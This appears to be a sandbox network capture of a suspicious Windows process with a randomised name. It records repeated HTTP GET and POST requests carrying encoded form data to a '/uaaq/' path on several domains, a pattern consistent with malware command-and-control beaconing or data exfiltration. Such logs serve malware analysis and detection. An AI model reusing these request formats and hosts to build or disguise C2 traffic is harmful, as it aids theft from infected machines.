                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:22.331523895 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:21 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    Link: <https://mariannaserocka.com/wp-json/>; rel="https://api.w.org/"
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Vary: Accept-Encoding,User-Agent
                                                                                    Content-Encoding: gzip
                                                                                    Content-Length: 11321
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    28 | 192.168.11.30 | 49782 | 65.108.122.245 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:24.134203911 CET | 431 | OUT | GET /uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.mariannaserocka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:24.823247910 CET | 603 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 04 Dec 2023 11:05:24 GMT
                                                                                    Server: Apache/2
                                                                                    X-Powered-By: PHP/8.1.25
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-UA-Compatible: IE=edge
                                                                                    X-Redirect-By: WordPress
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Location: http://mariannaserocka.com/uaaq/?9pG0L=H11jHdK8tiQEdc8HiBJGcTnPn4JeKO7dY7p2R0AEMYCSTpUW3HGmQSiGfhMiAqlsALoBPlIqyHCk3n5D4MLz3+EHJa2hwQp0yQ==&XFs82=6R5Xx6907
                                                                                    Vary: User-Agent
                                                                                    Content-Length: 0
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    29 | 192.168.11.30 | 49783 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:30.248097897 CET | 719 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0HFe7ObwoTcdmheGAtej032BfSubEIC7lI0fM1jEz1PApiZinHmN3Lty5tIEdIthK3LNnlWicVDXj1Efh7WuY70oUMv+Q3/G1xMkmMp6Z+r5I7M04Z/Z+gSXyG9USAFPDDsg7Fhv2DGczajONCepTzMhvQpTeygjkJ44eog==
                                                                                    Dec 4, 2023 12:05:30.585594893 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:30 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    30 | 192.168.11.30 | 49784 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:32.953109026 CET | 739 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=jo/WBZ0hfuo0GkO7M8EoU8dnkeGAjOjw3xJfSriJPwvlNlDMniEz2PAp2piiIGM1LtubtMEdIsFK3K9nlHjKTTXhh0fj/WuY70oUMva23+u124YmeY6YwL5H8M04d/ZygSXAG4w0AHHDDtw7G171MGc9UDPiGKwm7LVwR7//zyeDBNUNvYT6GJW0sZmVoCU/1fxB1xU=
                                                                                    Dec 4, 2023 12:05:33.256828070 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:33 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    31 | 192.168.11.30 | 49785 | 162.0.222.119 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:35.655472040 CET | 1656 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.spark-tech-global.xyz
                                                                                    Referer: http://www.spark-tech-global.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:35.961343050 CET | 587 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:35 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    32 | 192.168.11.30 | 49786 | 162.0.222.119 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:38.359138012 CET | 433 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=uqX2CpJoJvwTFA+ZFtoTb/Viquue5JaT7gdpcN3qNHbjP1Cd4gItxtd6vZy9N0V5BOWbrcI9A+ppibdEzCLbbhznzUeV+CWA9w== HTTP/1.1
                                                                                    Host: www.spark-tech-global.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:38.667846918 CET | 602 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:38 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    33 | 192.168.11.30 | 49787 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:44.292829037 CET | 710 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT2CTMtyHb4oQN3OhxmYwlYOyRXGlhmzhp6LK23O8PrsHV+6Vx4XmURIzN7FoL0Gny3LVegKqIOQjAuO4e8JyiGQ8MMYdgipwELL0cgw7AHhrsTw0MoWv3xx1T9Fa2Y5u2LJ3tII8oeVwhTZRx8ESamS7vYxbKfxNBtZLBuA==
                                                                                    Dec 4, 2023 12:05:44.475306988 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:44 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    34 | 192.168.11.30 | 49788 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:47.000072002 CET | 730 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT3ijM+kPb+IQOrehx/Iw+YO+RXCcsmHNp/e224qoPosHVrKV023mdRI/j7FkL0Gjy3Llej7qLPAjCoO4QkpyiGQ8MMc9GipoEL7EciUPDKBrvWw0MsWvzxx1l9E2YY7m2LIHtJaUnVVw7MpQ/tljwqA7UVwjzGE1RoMnSp+ZL31D0bj3B2mz3vYXbqd8=
                                                                                    Dec 4, 2023 12:05:47.179019928 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:47 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    35 | 192.168.11.30 | 49789 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:49.704207897 CET | 1647 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.ayotundewrites.com
                                                                                    Referer: http://www.ayotundewrites.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:49.886549950 CET | 1069 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:49 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    36 | 192.168.11.30 | 49790 | 83.229.19.76 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:52.405169964 CET | 430 | OUT | GET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:52.587255955 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    Data Ascii: 5d6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.ayotundewrites.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short
                                                                                    Dec 4, 2023 12:05:52.587331057 CET | 426 | IN | Data Raw: 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61
                                                                                    Data Ascii: error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it
                                                                                    Dec 4, 2023 12:05:52.589046001 CET | 59 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    37 | 192.168.11.30 | 49791 | 163.197.216.134 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:05:59.101125002 CET | 686 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.viough.com
                                                                                    Referer: http://www.viough.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=rN0Ix2UxZL5ezL/YAZp1flC1ec/Y61Ddwnuv/HJ1m791YXhFbemJOGhNwfCH+PMC5mEjD0GkDdLYbRuiX8Q7Gl5AIvy4FtKMG9mNwy+Gl45D7OoUNngT6QJsr9JmV8pvGqoLqA2ealNWZQCGhKco7SFrxdZCSvvcbbm9BMG97+jrVptaGg==
                                                                                    Dec 4, 2023 12:05:59.453339100 CET | 751 | IN | HTTP/1.1 405 Not Allowed
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:05:59 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 552
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    38 | 192.168.11.30 | 49792 | 163.197.216.134 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:06:04.324323893 CET | 706 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.viough.com
                                                                                    Referer: http://www.viough.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=rN0Ix2UxZL5eyrvYPed1ZFCqR8/Y0VDRwniv/GcunOl1Y3RFJfmJbGhN7/CCzvMV5m5cD16kDZrYbR+iWL88FV4mAPy2LNKMG9mNwzbRl8VD4+4UPCMcwwJtidJmEspzGqoTqDzxam1WZRyGhYkpsCFpstYgbfa5TKK1EqylueOUU8BJBcaHyn2pPtGSibWTDfNr8MA=
                                                                                    Dec 4, 2023 12:06:04.665612936 CET | 751 | IN | HTTP/1.1 405 Not Allowed
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:06:04 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 552
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    39 | 192.168.11.30 | 49793 | 163.197.216.134 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:06:08.221304893 CET | 1623 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.viough.com
                                                                                    Referer: http://www.viough.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:06:08.911247969 CET | 1340 | OUT | Data Raw: 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 3b 20 49 6e 74 65 6c 20 4d 61 63 20 4f 53 20 58 20 31 30 5f 31
                                                                                    Data Ascii: ion/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.369pG0L=rN0Ix2UxZL5eyrvYPed1ZFCqR8/Y0VDRwniv/GcunNF1bEZFb8OJJ2hNyfCDzvNX5mgVD12OD
                                                                                    Dec 4, 2023 12:06:11.575618982 CET | 751 | IN | HTTP/1.1 405 Not Allowed
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:06:08 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 552
                                                                                    Connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    40 | 192.168.11.30 | 49794 | 163.197.216.134 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 4, 2023 12:06:11.088349104 CET | 422 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=mPcoyCc3cvVI56HjA/xjRVjOd7rNkjWE/WSPp3YblL8zBWhOEeaQXn4Q6MGv1focxns6TnusPsnXCCahRqcYb38qMNH6MpLfYA== HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:06:11.446832895 CET | 1340 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:06:11 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Data Ascii: ffc0<!DOCTYPE HTML><html><head> <meta charset="UTF-8"> <title>pg/IOS/</title> <meta name="keywords" content="pg/IOS/" /> <meta name="description" content="WTAATPMLBKBOLOLDOTA2CS:GOh2h/,;,,;" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <link href="http://re
                                                                                    Dec 4, 2023 12:06:11.446909904 CET | 1340 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 34 6c 2e 76 69 6f 75 67 68 2e 63 6f 6d 2f 61 6e 64 72 6f 69 64 2f 32 30 32 33 2d 31 32
                                                                                    Data Ascii: <a href="http://d4l.viough.com/android/2023-12-04/y7y0_69955.html" target="_blank"> <img src="/appicon/389/1943737.jpg" alt=""><span class=
                                                                                    Dec 4, 2023 12:06:11.796828032 CET | 1340 | IN | Data Raw: 73 6f 75 72 63 65 2e 76 69 6f 75 67 68 2e 63 6f 6d 2f 74 70 6c 73 2f 63 63 72 6b 65 2f 70 63 2f 73 74 61 74 69 63 2f 63 73 73 2f 63 61 74 61 6c 6f 67 5f 61 7a 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20
                                                                                    Data Ascii: source.viough.com/tpls/ccrke/pc/static/css/catalog_az.css" rel="stylesheet"> <link href="http://resource.viough.com/tpls/ccrke/pc/static/css/soft_item.css" rel="stylesheet"> <script src="http://resource.viough.com/tpls/ccrke/pc/stati
                                                                                    Dec 4, 2023 12:06:11.796911001 CET | 1340 | IN | Data Raw: 65 72 74 79 3d 22 6f 67 3a 72 65 6c 65 61 73 65 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 33 2d 31 32 2d 30 34 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e
                                                                                    Data Ascii: erty="og:release_date" content="2023-12-04"> <meta property="og:title" content="pg"> <meta property="og:soft:language" content=""> <meta property="og:soft:license" content=""
                                                                                    Dec 4, 2023 12:06:11.796969891 CET | 1340 | IN | Data Raw: 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6f 75 67 68 2e 63 6f 6d 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 72 65 73 6f 75 72 63 65 2e 76 69 6f 75 67 68 2e 63 6f 6d 2f 74 70 6c 73 2f 63 63 72 6b 65 2f 70 63 2f 73 74 61
                                                                                    Data Ascii: ref="http://www.viough.com"><img src="http://resource.viough.com/tpls/ccrke/pc/static/picture/logoanzhuo.png" alt=""></a></div> <div class="header_r"> <div class="search"> <form
